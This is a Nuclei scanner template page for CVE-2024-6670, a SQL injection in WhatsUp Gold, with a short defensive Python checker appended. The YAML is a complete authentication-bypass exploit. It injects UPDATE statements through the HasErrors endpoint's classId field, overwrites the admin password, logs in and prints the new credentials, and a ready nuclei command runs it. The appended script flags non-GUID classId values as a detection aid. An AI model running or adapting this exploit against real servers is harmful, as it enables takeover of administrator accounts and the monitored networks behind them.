WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
ID: CVE-2024-6670
Severity: critical
Author: DhiyaneshDK,princechaddha
Tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev
Description
In WhatsUp Gold versions released before 2024.0.0, a SQL injection vulnerability allows an unauthenticated attacker to retrieve the user's encrypted password.
YAML Source
id: CVE-2024-6670

info:
  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
  reference:
    - https://github.com/sinsinology/CVE-2024-6670
    - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
    - https://www.progress.com/network-monitoring
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6670
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09569
    cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
    product: whatsup_gold
    vendor: progress
  tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev

flow: |
  http(1);
  http(2);
  http(3);
  encryptedPassword = template.encryptedPassword
  const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
  const hexValues = cleanedInput.map(value => {
    const num = parseInt(value);
    return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
  });
  log(hexValues);
  const hexString = hexValues.join('');
  const varbinaryString = '0x' + hexString;
  set("encryptedPassword", varbinaryString);
  http(4) && http(5);

variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
        condition: and
        internal: true

  - raw:
      - |
        GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'DisplayName')
        condition: and
        internal: true

    extractors:
      - type: regex
        internal: true
        name: encryptedPassword
        regex:
          - '"psyduck\d+(,\d+)*"'

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'false')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/User/LoginAjax HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&rememberMe=false

    matchers:
      - type: word
        part: body
        words:
          - '"authenticated":true'
          - '"username":"'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a00473045022075b4f7e1d456f4b504d32450755c486437677be47a320333c006a77a33dc568a022100bf0b73b40075e0195311daddd26bf8ea379d4322cce7576528e0b76e0f264e17:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6670.yaml"
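On the defensive side, both injecting requests in the template carry their SQL in the classId field of a POST to the HasErrors endpoint, and the template's own value begins as a GUID. The check below is an added example (not part of the template or the Nuclei project) that flags captured requests whose classId is anything other than a bare GUID. The JSON-lines capture format with src, method, path and body fields, and the rule that a legitimate classId is always a GUID, are assumptions.

```python
import json
import re

# Endpoint and field come from the template's second and fourth requests.
HAS_ERRORS_PATH = "/NmConsole/Platform/PerformanceMonitorErrors/HasErrors"
# Assumption: a legitimate classId is always a bare GUID.
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

def check_record(record):
    """Return a finding for one captured request, or None if nothing stands out."""
    path = str(record.get("path", "")).split("?", 1)[0].rstrip("/").lower()
    if str(record.get("method", "")).upper() != "POST" or path != HAS_ERRORS_PATH.lower():
        return None
    try:
        body = json.loads(record.get("body", ""))
    except (TypeError, ValueError):
        return "HasErrors request with unparseable JSON body"
    class_id = body.get("classId") if isinstance(body, dict) else None
    if not isinstance(class_id, str):
        return "HasErrors request without a string classId"
    if not GUID_RE.fullmatch(class_id.strip()):
        return f"HasErrors classId is not a bare GUID ({len(class_id)} chars)"
    return None

def scan(lines):
    """Scan JSON-lines capture records; return (line_no, src, finding) tuples."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        try:
            record = json.loads(line)
        except ValueError:
            continue  # not a capture record
        finding = check_record(record) if isinstance(record, dict) else None
        if finding:
            findings.append((line_no, record.get("src", "?"), finding))
    return findings

def _rec(src, path, body):
    # Builds one constructed capture line; the field names are hypothetical.
    return json.dumps({"src": src, "method": "POST", "path": path, "body": body})

GUID = "DF215E10-8BD4-4401-B2DC-99BB03135F2E"
SAMPLE = [  # constructed sample data, not real traffic
    _rec("192.0.2.10", HAS_ERRORS_PATH, json.dumps({"deviceId": "22222", "classId": GUID})),
    _rec("198.51.100.7", HAS_ERRORS_PATH, json.dumps({"deviceId": "22222", "classId": GUID + "';--"})),
    _rec("198.51.100.7", "/NmConsole/User/LoginAjax", "username=admin"),
]
if __name__ == "__main__":
    print(scan(SAMPLE))
```

The finding reports only the length of the offending value, so the raw string is not copied into alert text.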